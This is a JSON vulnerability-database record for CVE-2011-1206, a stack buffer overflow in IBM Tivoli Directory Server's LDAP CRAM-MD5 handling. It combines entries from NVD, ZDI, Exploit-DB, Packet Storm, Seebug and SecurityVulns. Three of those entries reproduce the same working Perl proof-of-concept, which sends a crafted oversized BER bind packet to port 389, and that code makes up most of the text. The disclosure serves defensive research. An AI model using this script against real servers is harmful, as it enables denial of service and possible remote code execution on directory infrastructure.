{"cve": [{"lastseen": "2019-05-29T18:11:08", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the server process in ibmslapd.exe in IBM Tivoli Directory Server (TDS) 5.2 before 5.2.0.5-TIV-ITDS-IF0010, 6.0 before 6.0.0.67 (aka 6.0.0.8-TIV-ITDS-IF0009), 6.1 before 6.1.0.40 (aka 6.1.0.5-TIV-ITDS-IF0003), 6.2 before 6.2.0.16 (aka 6.2.0.3-TIV-ITDS-IF0002), and 6.3 before 6.3.0.3 (aka 6.3.0.0-TIV-ITDS-IF0003) allows remote attackers to execute arbitrary code via a crafted LDAP request. NOTE: some of these details are obtained from third party information.", "modified": "2017-08-17T01:34:00", "id": "CVE-2011-1206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1206", "published": "2011-04-21T10:55:00", "title": "CVE-2011-1206", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:23:00", "bulletinFamily": "exploit", "description": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution. CVE-2011-1206. 
Dos exploit for windows platform", "modified": "2011-04-19T00:00:00", "published": "2011-04-19T00:00:00", "id": "EDB-ID:17188", "href": "https://www.exploit-db.com/exploits/17188/", "type": "exploitdb", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution", "sourceData": "Source: http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=26&Itemid=26\r\n\r\n#####################################################################################\r\n\r\nApplication: IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\r\n\r\nPlatforms: Windows\r\n\r\nExploitation: Remote code execution\r\n\r\nCVE Number: CVE-2011-1206 \r\n\r\nZDI number: ZDI-11-136\r\n\r\n{PRL}: 2011-06\r\n\r\nAuthor: Francis Provencher (Protek Research Lab's)\r\n\r\nWebSite: http://www.protekresearchlab.com/\r\n\r\nTwitter: @ProtekResearch\r\n\r\n\r\n#####################################################################################\r\n\r\n1) Introduction\r\n2) Report Timeline\r\n3) Technical details\r\n4) POC\r\n\r\n#####################################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\nIBM Tivoli Directory Server (ITDS), formerly known as IBM Directory Server,\r\n\r\nis an IBM implementation of the Lightweight Directory Access Protocol,\r\n\r\nand is part of the IBM Tivoli Identity & Access Management portfolio.\r\n\r\nIBM Tivoli Directory Server is a powerful, security-rich and standards-compliant\r\n\r\nenterprise directory for corporate intranets and the Internet. 
Directory Server is\r\n\r\nbuilt to serve as the identity data foundation for rapid development and deployment\r\n\r\nof Web applications and security and identity management initiatives by including\r\n\r\nstrong management, replication and security features. Several authentication methods\r\n\r\nare available with IBM Tivoli Directory Server, beyond basic usernames and passwords.\r\n\r\nITDS supports digital certificate-based authentication, the Simple Authentication and\r\n\r\nSecurity Layer (SASL), Challenge-Response Authentication Mechanism MD5 (CRAM-MD5),\r\n\r\nand Kerberos authentication. IBM Tivoli Directory Server is a powerful LDAP\r\n\r\ninfrastructure that provides a foundation for deploying comprehensive identity management\r\n\r\napplications and advanced software architectures.\r\n\r\n(http://en.wikipedia.org/wiki/IBM_Tivoli_Directory_Server)\r\n\r\n#####################################################################################\r\n\r\n============================\r\n2) Report Timeline\r\n============================\r\n\r\n2011-02-17 - Vulnerability reported to vendor\r\n2011-04-18 - Coordinated public release of advisory\r\n\r\n\r\n#####################################################################################\r\n\r\n====================\r\n3) Technical details\r\n====================\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable\r\n\r\ninstallations of IBM Tivoli Directory Server. Authentication is not required to\r\n\r\nexploit this vulnerability. The specific flaw exists in how ibmslapd.exe handles\r\n\r\nLDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the\r\n\r\nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the\r\n\r\nallocation of a buffer for the packet data. 
A specially crafted packet can cause\r\n\r\nthe ber_get_int function to allocate a buffer that is too small to fit the packet\r\n\r\ndata, causing a subsequent stack-based buffer overflow. This can be leveraged by\r\n\r\na remote attacker to execute arbitrary code under the context of the SYSTEM user.\r\n\r\n\r\n#####################################################################################\r\n\r\n===========\r\n4) POC\r\n===========\r\n\r\n#!/usr/bin/perl\r\n\r\n\r\nuse strict;\r\nuse warnings;\r\n\r\nuse Getopt::Std;\r\nuse IO::Socket::INET;\r\n\r\n$SIG{INT} = \\&abort;\r\n\r\nmy $host = '192.168.100.24';\r\nmy $port = 389;\r\nmy $proto = 'tcp';\r\nmy $sockType = SOCK_STREAM;\r\nmy $timeout = 1;\r\n\r\nmy %opt;\r\nmy $opt_string = 'hH:P:t:';\r\ngetopts( \"$opt_string\", \\%opt );\r\n\r\nif (defined $opt{h}) {\r\n usage()\r\n}\r\n\r\n$host = $opt{H} ? $opt{H} : $host;\r\n$port = $opt{P} ? $opt{P} : $port;\r\n$timeout = $opt{t} ? $opt{t} : $timeout;\r\n\r\nmy @commands = (\r\n{Command => 'Send',\r\n Data => \"\\x30\\x18\\x02\\x01\\x01\\x60\\x13\\x02\\x01\\x03\\x04\\x00\\xA3\\x0C\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x00\"},\r\n{Command => 'Receive'},\r\n{Command => 'Send',\r\n Data => 
\"\\x30\\x82\\x01\\x41\\x02\\x01\\x02\\x60\\x82\\x01\\x3A\\x02\\x01\\x03\\x04\\x00\\xA3\\x82\\x01\\x31\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x84\\xFF\\xFF\\xFF\\xFF\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x20\\x36\\x61\\x37\\x61\\x31\\x31\\x34\\x39\\x36\\x30\\x33\\x61\\x64\\x37\\x64\\x30\\x33\\x34\\x39\\x35\\x66\\x39\\x65\\x37\\x31\\x34\\x66\\x34\\x30\\x66\\x31\\x63\"},\r\n{Command => 'Receive'},\r\n\r\n);\r\n\r\n\r\nmy $sock = new IO::Socket::INET (\t\r\n PeerAddr => $host,\r\n\t\t\t\t PeerPort => $port, \r\n\t\t\t\t Proto => $proto,\r\n Type => $sockType,\r\n Timeout => $timeout,\r\n ) \r\n or die \"socket error: $!\\n\\n\";\r\n\r\nprint \"connected to: $host:$port\\n\";\r\n\r\n$sock->autoflush(1);\r\nbinmode 
$sock;\r\n\r\n\r\nforeach my $command (@commands)\r\n{\r\n if ($command->{'Command'} eq 'Receive')\r\n {\r\n my $buf = receive($sock, $timeout);\r\n if (length $buf)\r\n {\r\n print \"received: [$buf]\\n\";\r\n }\r\n }\r\n elsif ($command->{'Command'} eq 'Send')\r\n {\r\n print \"sending: [\".$command->{'Data'}.\"]\\n\";\r\n send ($sock, $command->{'Data'}, 0) or die \"send failed, reason: $!\\n\";\r\n }\r\n}\r\n\r\nclose ($sock);\r\n\r\n\r\nsub receive\r\n{\r\n my $sock = shift;\r\n my $timeout = shift;\r\n\r\n my $tmpbuf;\r\n my $buf = \"\";\r\n\r\n while(1)\r\n { \r\n eval {\r\n local $SIG{ALRM} = sub { die \"timeout\\n\" };\r\n alarm $timeout;\r\n\r\n my $ret = read $sock, $tmpbuf, 1; \r\n if ( !defined $ret or $ret == 0 )\r\n { \r\n die \"timeout\\n\";\r\n }\r\n\r\n alarm 0;\r\n $buf .= $tmpbuf;\r\n };\r\n if ($@) { \r\n if($@ eq \"timeout\\n\")\r\n {\r\n last;\r\n }\r\n else {\r\n die \"receive aborted\\n\";\r\n }\r\n }\r\n } \r\n return $buf;\r\n}\r\n\r\nsub abort\r\n{\r\n print \"...\\n\";\r\n if ($sock)\r\n {\r\n close $sock;\r\n }\r\n die \"...\\n\";\r\n}\r\nsub usage\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17188/"}], "zdi": [{"lastseen": "2016-11-09T00:17:58", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Directory Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists in how ibmslapd.exe handles LDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the process receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the allocation of a buffer for the packet data. A specially crafted packet can cause the ber_get_int function to allocate a buffer that is too small to fit the packet data, causing a subsequent stack-based buffer overflow. 
This can be leveraged by a remote attacker to execute arbitrary code under the context of the SYSTEM user.", "modified": "2011-11-09T00:00:00", "published": "2011-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-136", "id": "ZDI-11-136", "title": "IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:21", "bulletinFamily": "exploit", "description": "", "modified": "2011-04-19T00:00:00", "published": "2011-04-19T00:00:00", "href": "https://packetstormsecurity.com/files/100576/IBM-Tivoli-Directory-Server-SASL-Bind-Request-Remote-Code-Execution.html", "id": "PACKETSTORM:100576", "type": "packetstorm", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution", "sourceData": "`##################################################################################### \n \nApplication: IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability \n \nPlatforms: Windows \n \nExploitation: Remote code execution \n \nCVE Number: CVE-2011-1206 \n \nZDI number: ZDI-11-136 \n \n{PRL}: 2011-06 \n \nAuthor: Francis Provencher (Protek Research Lab's) \n \nWebSite: http://www.protekresearchlab.com/ \n \nTwitter: @ProtekResearch \n \n \n##################################################################################### \n \n1) Introduction \n2) Report Timeline \n3) Technical details \n4) POC \n \n##################################################################################### \n \n=============== \n1) Introduction \n=============== \n \nIBM Tivoli Directory Server (ITDS), formerly known as IBM Directory Server, \n \nis an IBM implementation of the Lightweight Directory Access Protocol, \n \nand is part of the IBM Tivoli Identity & Access Management portfolio. 
\n \nIBM Tivoli Directory Server is a powerful, security-rich and standards-compliant \n \nenterprise directory for corporate intranets and the Internet. Directory Server is \n \nbuilt to serve as the identity data foundation for rapid development and deployment \n \nof Web applications and security and identity management initiatives by including \n \nstrong management, replication and security features. Several authentication methods \n \nare available with IBM Tivoli Directory Server, beyond basic usernames and passwords. \n \nITDS supports digital certificate-based authentication, the Simple Authentication and \n \nSecurity Layer (SASL), Challenge-Response Authentication Mechanism MD5 (CRAM-MD5), \n \nand Kerberos authentication. IBM Tivoli Directory Server is a powerful LDAP \n \ninfrastructure that provides a foundation for deploying comprehensive identity management \n \napplications and advanced software architectures. \n \n(http://en.wikipedia.org/wiki/IBM_Tivoli_Directory_Server) \n \n##################################################################################### \n \n============================ \n2) Report Timeline \n============================ \n \n2011-02-17 - Vulnerability reported to vendor \n2011-04-18 - Coordinated public release of advisory \n \n \n##################################################################################### \n \n==================== \n3) Technical details \n==================== \n \nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable \n \ninstallations of IBM Tivoli Directory Server. Authentication is not required to \n \nexploit this vulnerability. The specific flaw exists in how ibmslapd.exe handles \n \nLDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the \n \nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the \n \nallocation of a buffer for the packet data. 
A specially crafted packet can cause \n \nthe ber_get_int function to allocate a buffer that is too small to fit the packet \n \ndata, causing a subsequent stack-based buffer overflow. This can be leveraged by \n \na remote attacker to execute arbitrary code under the context of the SYSTEM user. \n \n \n##################################################################################### \n \n=========== \n4) POC \n=========== \n \n \n \n#!/usr/bin/perl \n \n \nuse strict; \nuse warnings; \n \nuse Getopt::Std; \nuse IO::Socket::INET; \n \n$SIG{INT} = \\&abort; \n \nmy $host = '192.168.100.24'; \nmy $port = 389; \nmy $proto = 'tcp'; \nmy $sockType = SOCK_STREAM; \nmy $timeout = 1; \n \nmy %opt; \nmy $opt_string = 'hH:P:t:'; \ngetopts( \"$opt_string\", \\%opt ); \n \nif (defined $opt{h}) { \nusage() \n} \n \n$host = $opt{H} ? $opt{H} : $host; \n$port = $opt{P} ? $opt{P} : $port; \n$timeout = $opt{t} ? $opt{t} : $timeout; \n \nmy @commands = ( \n{Command => 'Send', \nData => \"\\x30\\x18\\x02\\x01\\x01\\x60\\x13\\x02\\x01\\x03\\x04\\x00\\xA3\\x0C\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x00\"}, \n{Command => 'Receive'}, \n{Command => 'Send', \nData => 
\"\\x30\\x82\\x01\\x41\\x02\\x01\\x02\\x60\\x82\\x01\\x3A\\x02\\x01\\x03\\x04\\x00\\xA3\\x82\\x01\\x31\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x84\\xFF\\xFF\\xFF\\xFF\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x20\\x36\\x61\\x37\\x61\\x31\\x31\\x34\\x39\\x36\\x30\\x33\\x61\\x64\\x37\\x64\\x30\\x33\\x34\\x39\\x35\\x66\\x39\\x65\\x37\\x31\\x34\\x66\\x34\\x30\\x66\\x31\\x63\"}, \n{Command => 'Receive'}, \n \n); \n \n \nmy $sock = new IO::Socket::INET ( \nPeerAddr => $host, \nPeerPort => $port, \nProto => $proto, \nType => $sockType, \nTimeout => $timeout, \n) \nor die \"socket error: $!\\n\\n\"; \n \nprint \"connected to: $host:$port\\n\"; \n \n$sock->autoflush(1); \nbinmode $sock; \n \n \nforeach my $command (@commands) \n{ \nif 
($command->{'Command'} eq 'Receive') \n{ \nmy $buf = receive($sock, $timeout); \nif (length $buf) \n{ \nprint \"received: [$buf]\\n\"; \n} \n} \nelsif ($command->{'Command'} eq 'Send') \n{ \nprint \"sending: [\".$command->{'Data'}.\"]\\n\"; \nsend ($sock, $command->{'Data'}, 0) or die \"send failed, reason: $!\\n\"; \n} \n} \n \nclose ($sock); \n \n \nsub receive \n{ \nmy $sock = shift; \nmy $timeout = shift; \n \nmy $tmpbuf; \nmy $buf = \"\"; \n \nwhile(1) \n{ \neval { \nlocal $SIG{ALRM} = sub { die \"timeout\\n\" }; \nalarm $timeout; \n \nmy $ret = read $sock, $tmpbuf, 1; \nif ( !defined $ret or $ret == 0 ) \n{ \ndie \"timeout\\n\"; \n} \n \nalarm 0; \n$buf .= $tmpbuf; \n}; \nif ($@) { \nif($@ eq \"timeout\\n\") \n{ \nlast; \n} \nelse { \ndie \"receive aborted\\n\"; \n} \n} \n} \nreturn $buf; \n} \n \nsub abort \n{ \nprint \"...\\n\"; \nif ($sock) \n{ \nclose $sock; \n} \ndie \"...\\n\"; \n} \nsub usage \n \n \n \n##################################################################################### \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/100576/PRL-2011-06.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:44:11", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71628", "id": "SSV:71628", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution", "type": "seebug", "sourceData": "\n Source: http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=26&Itemid=26\r\n\r\n#####################################################################################\r\n\r\nApplication: IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\r\n\r\nPlatforms: Windows\r\n\r\nExploitation: Remote code execution\r\n\r\nCVE Number: CVE-2011-1206 
\r\n\r\nZDI number: ZDI-11-136\r\n\r\n{PRL}: 2011-06\r\n\r\nAuthor: Francis Provencher (Protek Research Lab's)\r\n\r\nWebSite: http://www.protekresearchlab.com/\r\n\r\nTwitter: @ProtekResearch\r\n\r\n\r\n#####################################################################################\r\n\r\n1) Introduction\r\n2) Report Timeline\r\n3) Technical details\r\n4) POC\r\n\r\n#####################################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\nIBM Tivoli Directory Server (ITDS), formerly known as IBM Directory Server,\r\n\r\nis an IBM implementation of the Lightweight Directory Access Protocol,\r\n\r\nand is part of the IBM Tivoli Identity & Access Management portfolio.\r\n\r\nIBM Tivoli Directory Server is a powerful, security-rich and standards-compliant\r\n\r\nenterprise directory for corporate intranets and the Internet. Directory Server is\r\n\r\nbuilt to serve as the identity data foundation for rapid development and deployment\r\n\r\nof Web applications and security and identity management initiatives by including\r\n\r\nstrong management, replication and security features. Several authentication methods\r\n\r\nare available with IBM Tivoli Directory Server, beyond basic usernames and passwords.\r\n\r\nITDS supports digital certificate-based authentication, the Simple Authentication and\r\n\r\nSecurity Layer (SASL), Challenge-Response Authentication Mechanism MD5 (CRAM-MD5),\r\n\r\nand Kerberos authentication. IBM Tivoli Directory Server is a powerful LDAP\r\n\r\ninfrastructure that provides a foundation for deploying comprehensive identity management\r\n\r\napplications and advanced software architectures.\r\n\r\n(http://en.wikipedia.org/wiki/IBM_Tivoli_Directory_Server)\r\n\r\n#####################################################################################\r\n\r\n============================\r\n2) Report Timeline\r\n============================\r\n\r\n2011-02-17 - 
Vulnerability reported to vendor\r\n2011-04-18 - Coordinated public release of advisory\r\n\r\n\r\n#####################################################################################\r\n\r\n====================\r\n3) Technical details\r\n====================\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable\r\n\r\ninstallations of IBM Tivoli Directory Server. Authentication is not required to\r\n\r\nexploit this vulnerability. The specific flaw exists in how ibmslapd.exe handles\r\n\r\nLDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the\r\n\r\nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the\r\n\r\nallocation of a buffer for the packet data. A specially crafted packet can cause\r\n\r\nthe ber_get_int function to allocate a buffer that is too small to fit the packet\r\n\r\ndata, causing a subsequent stack-based buffer overflow. This can be leveraged by\r\n\r\na remote attacker to execute arbitrary code under the context of the SYSTEM user.\r\n\r\n\r\n#####################################################################################\r\n\r\n===========\r\n4) POC\r\n===========\r\n\r\n#!/usr/bin/perl\r\n\r\n\r\nuse strict;\r\nuse warnings;\r\n\r\nuse Getopt::Std;\r\nuse IO::Socket::INET;\r\n\r\n$SIG{INT} = \\&abort;\r\n\r\nmy $host = '192.168.100.24';\r\nmy $port = 389;\r\nmy $proto = 'tcp';\r\nmy $sockType = SOCK_STREAM;\r\nmy $timeout = 1;\r\n\r\nmy %opt;\r\nmy $opt_string = 'hH:P:t:';\r\ngetopts( "$opt_string", \\%opt );\r\n\r\nif (defined $opt{h}) {\r\n usage()\r\n}\r\n\r\n$host = $opt{H} ? $opt{H} : $host;\r\n$port = $opt{P} ? $opt{P} : $port;\r\n$timeout = $opt{t} ? 
$opt{t} : $timeout;\r\n\r\nmy @commands = (\r\n{Command => 'Send',\r\n Data => "\\x30\\x18\\x02\\x01\\x01\\x60\\x13\\x02\\x01\\x03\\x04\\x00\\xA3\\x0C\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x00"},\r\n{Command => 'Receive'},\r\n{Command => 'Send',\r\n Data => "\\x30\\x82\\x01\\x41\\x02\\x01\\x02\\x60\\x82\\x01\\x3A\\x02\\x01\\x03\\x04\\x00\\xA3\\x82\\x01\\x31\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x84\\xFF\\xFF\\xFF\\xFF\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x20\\x36\\x61\\x37\\x61\\x31\\x31\\x34\\x39\\x36\\x30\\x33\\x61\\x64\\x37\\x64\\x30\\x33\\x34\\x39\\x35\\x66\\x39\\x65\\x37\\x31\\x34\\x66\\x34\\x30\\x66\\x31\\x63"},\r\n{Command => 'Receive'},\r\n\r\n);\r\n\r\n\r\nmy $sock = new IO::Socket::INET (\t\r\n 
PeerAddr => $host,\r\n\t\t\t\t PeerPort => $port, \r\n\t\t\t\t Proto => $proto,\r\n Type => $sockType,\r\n Timeout => $timeout,\r\n ) \r\n or die "socket error: $!\\n\\n";\r\n\r\nprint "connected to: $host:$port\\n";\r\n\r\n$sock->autoflush(1);\r\nbinmode $sock;\r\n\r\n\r\nforeach my $command (@commands)\r\n{\r\n if ($command->{'Command'} eq 'Receive')\r\n {\r\n my $buf = receive($sock, $timeout);\r\n if (length $buf)\r\n {\r\n print "received: [$buf]\\n";\r\n }\r\n }\r\n elsif ($command->{'Command'} eq 'Send')\r\n {\r\n print "sending: [".$command->{'Data'}."]\\n";\r\n send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\\n";\r\n }\r\n}\r\n\r\nclose ($sock);\r\n\r\n\r\nsub receive\r\n{\r\n my $sock = shift;\r\n my $timeout = shift;\r\n\r\n my $tmpbuf;\r\n my $buf = "";\r\n\r\n while(1)\r\n { \r\n eval {\r\n local $SIG{ALRM} = sub { die "timeout\\n" };\r\n alarm $timeout;\r\n\r\n my $ret = read $sock, $tmpbuf, 1; \r\n if ( !defined $ret or $ret == 0 )\r\n { \r\n die "timeout\\n";\r\n }\r\n\r\n alarm 0;\r\n $buf .= $tmpbuf;\r\n };\r\n if ($@) { \r\n if($@ eq "timeout\\n")\r\n {\r\n last;\r\n }\r\n else {\r\n die "receive aborted\\n";\r\n }\r\n }\r\n } \r\n return $buf;\r\n}\r\n\r\nsub abort\r\n{\r\n print "...\\n";\r\n if ($sock)\r\n {\r\n close $sock;\r\n }\r\n die "...\\n";\r\n}\r\nsub usage\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71628"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "ZDI-11-136 (formerly ZDI-CAN-1022): IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request\r\nRemote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-136\r\n\r\nApril 18, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-1206\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nIBM\r\n\r\n-- Affected Products:\r\nIBM Tivoli Directory 
Server\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11092. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of IBM Tivoli Directory Server. Authentication\r\nis not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists in how ibmslapd.exe handles LDAP CRAM-MD5\r\npackets. ibmslapd.exe listens by default on port TCP 389. When the\r\nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to\r\nhandle the allocation of a buffer for the packet data. A specially\r\ncrafted packet can cause the ber_get_int function to allocate a buffer\r\nthat is too small to fit the packet data, causing a subsequent\r\nstack-based buffer overflow. This can be leveraged by a remote attacker\r\nto execute arbitrary code under the context of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nIBM has issued an update to correct this vulnerability. 
